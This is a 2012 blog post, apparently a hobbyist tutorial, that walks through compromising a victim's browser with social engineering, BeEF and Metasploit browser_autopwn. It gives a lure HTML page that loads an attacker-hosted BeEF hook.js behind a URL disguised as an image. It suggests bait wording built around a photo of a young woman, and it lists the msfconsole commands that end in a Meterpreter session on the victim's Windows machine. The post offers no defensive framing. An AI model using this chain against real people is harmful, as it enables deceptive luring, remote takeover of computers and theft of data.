Comments

Pages

Friday, 19 October 2012

Social Engineering + BeEF + Metasploit, finally pwned

Posted by at 11:58 Read our previous post
Heiyo, today we will learn about pwned victim from browser. My scenario is :

  1. Make user visit our page, with SocialEngineering
  2. Setup BeEF
  3. Setup Metasploit browser_autopwn
  4. Play and Pwned
Ok, lets doing



#1. Social Engineering


Social Engineering with the best plan will result the best thing. I have plan to make link to the target. Of course the link must create interest. In this case I will create page with contain Ayana images (JKT48 personel). She is a beauty girl, so the target victim is Male of course. Hehe
Prepare the Ayana images, named cantik.jpg
Lets create the page with code below :
<html>
<head>
<title>Ayana.jpg</title>
<script src="http://192.168.56.101:3000/hook.js"></script> <!-- file JS from BeEF -->
</head>
<body>
<img src="cantik.jpg" />
</body>
</html>
Save as this file with named index.html
Place the file into this directory /var/www/ayana.jpg/
* 192.168.56.101 is our ip address (attacker machine)
* ayana.jpg is directory, its to make the uri look a like addressed to images file.

Run your apache service, to make it work.

#2. Setup BeEF

Run the BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEF
Open the panel of BeEF using your browser here http://127.0.0.1:3000/ui/panel
Now, give the target address http://192.168.56.101/ayana.jpg
You can use your favorite technique to gives the link, may be you can say that "Hei bro, look the beautiful girl here http://192.168.56.101/ayana.jpg"
Back into BeEF panel to monitor your target.

Here, my target running Windows XP SP3 with IE 8 installed.

#3. Setup Metasploit browser_autopwn

Before I have read about browser_autopwn on metasploit (here), so I have idea to do that on my scenario.
Open msfconsole, then type :
msf > use auxiliary/server/browser_autopwn
Show the options for this auxiliary, type :
msf  auxiliary(browser_autopwn) > show options
set the LHOST with our IP address (attacker machine), type:
msf  auxiliary(browser_autopwn) > set LHOST 192.168.56.101
Run the auxiliary, type :
msf  auxiliary(browser_autopwn) > run
Wait until you see that
At this point, we need to notes the exploit address. http://192.168.56.101/paVleLsD
* 192.168.56.101 is our ip (attacker machine)

#4. Lets play the game

Ok, the resume of scenarios is :
- Give the target some of url with contain images. http://192.168.56.101/ayana.jpg
When vitctim access this page, he/she will see it :

- After that, back into BeEF panel and see what happens on that
The attacker was connected to BeEF with IE 8. Now redirect the victim into metasploit. See the image below for detail.

As we can see that the metasploit was successfully gaining access into windows system.

 Now, check the session on metasploit with command :
sessions -l
Connect to windows using meterpreter. Type :
sessions -i 2
* 2 is id of sessions on metasploit


No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template